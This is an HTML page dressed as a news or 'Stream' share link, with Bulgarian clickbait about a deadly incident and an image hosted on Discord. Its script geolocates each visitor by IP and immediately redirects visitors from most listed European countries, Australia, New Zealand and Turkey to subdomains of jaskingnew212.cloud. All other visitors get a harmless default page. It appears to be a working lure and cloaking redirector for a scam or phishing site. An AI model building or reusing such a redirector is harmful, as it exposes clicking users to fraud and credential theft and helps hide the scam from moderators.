<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="118,132,105,посещения"/>
<meta name="robots" content="index, follow"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Трагичният инцидент взе няколко жертви тази сутрин."/>
<meta property="og:image" content="https://media.discordapp.net/attachments/1225045975517757527/1225422395871858688/fdsfdsadsewq333.png?ex=6621128a&is=660e9d8a&hm=7ce223e09f3341c8157a06f394fb67801fd7d4a9699f7e6c122888d65d3962ca&=&format=webp&quality=lossless"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<!DOCTYPE html>
<html>
<head>
    <script type="text/javascript">
        // Función para obtener el país del usuario basado en su dirección IP
        function getCountryFromIP(callback) {
            // Llamada a un servicio de geolocalización basado en IP (puedes utilizar servicios como ipapi.co, ipinfo.io, etc.)
            fetch('https://ipapi.co/json/')
                .then(response => response.json())
                .then(data => {
                    // Llama al callback con el código del país obtenido
                    callback(data.country);
                })
                .catch(error => {
                    console.error('Error al obtener la ubicación del usuario:', error);
                    // Si hay un error, llama al callback con un valor predeterminado (por ejemplo, 'US' para Estados Unidos)
                    callback('US');
                });
        }

        // Redirigir a la URL específica según el país del usuario
        getCountryFromIP(function(countryCode) {
            switch(countryCode) {
                case 'AT':
                    window.location.replace("https://jaynesne201.jaskingnew212.cloud");
                    break;
                case 'AU':
                    window.location.replace("https://jaynesne201.jaskingnew212.cloud");
                    break;
				case 'BE':
                    window.location.replace("https://jaynesne201.jaskingnew212.cloud");
                    break;
				case 'BG':
                    window.location.replace("https://facsd12.jaskingnew212.cloud/");
                    break;
				case 'HR':
                    window.location.replace("https://jaynesne201.jaskingnew212.cloud");
                    break;
				case 'CY':
                    window.location.replace("https://jaynesne201.jaskingnew212.cloud");
                    break;
				case 'DK':
                    window.location.replace("https://jaynesne201.jaskingnew212.cloud");
                    break;
				case 'FR':
                    window.location.replace("https://jaynesne201.jaskingnew212.cloud");
                    break;
				case 'AL':
                    window.location.replace("https://facsd12.jaskingnew212.cloud/");
                    break;
				case 'DE':
                    window.location.replace("https://jaynesne201.jaskingnew212.cloud");
                    break;
				case 'GR':
                    window.location.replace("https://jaynesne201.jaskingnew212.cloud");
                    break;	
				case 'IT':
                    window.location.replace("https://jaynesne201.jaskingnew212.cloud");
                    break;
				case 'MT':
                    window.location.replace("https://jaynesne201.jaskingnew212.cloud");
                    break;
				case 'NL':
                    window.location.replace("https://jaynesne201.jaskingnew212.cloud");
                    break;	
				case 'NZ':
                    window.location.replace("https://jaynesne201.jaskingnew212.cloud");
                    break;
				case 'PT':
                    window.location.replace("https://jaynesne201.jaskingnew212.cloud");
                    break;	
				case 'PO':
                    window.location.replace("https://jaynesne201.jaskingnew212.cloud");
                    break;	
				case 'ES':
                    window.location.replace("https://jaynesne201.jaskingnew212.cloud");
                    break;	
				case 'SE':
                    window.location.replace("https://jaynesne201.jaskingnew212.cloud");
                    break;	
				case 'CH':
                    window.location.replace("https://jaynesne201.jaskingnew212.cloud");
                    break;	
				case 'TR':
                    window.location.replace("https://jaynesne201.jaskingnew212.cloud");
                    break;
				case 'GB':
                    window.location.replace("https://jaynesne201.jaskingnew212.cloud");
                    break;
				case 'AE':
             	
                // Agrega más casos según los países que desees manejar
                default:
                    window.location.replace("https://example.com/default_page.html");
            }
        });
    </script>
</head>
<body>
    <!-- Aquí puedes agregar contenido adicional si lo deseas -->
</body>
</html>

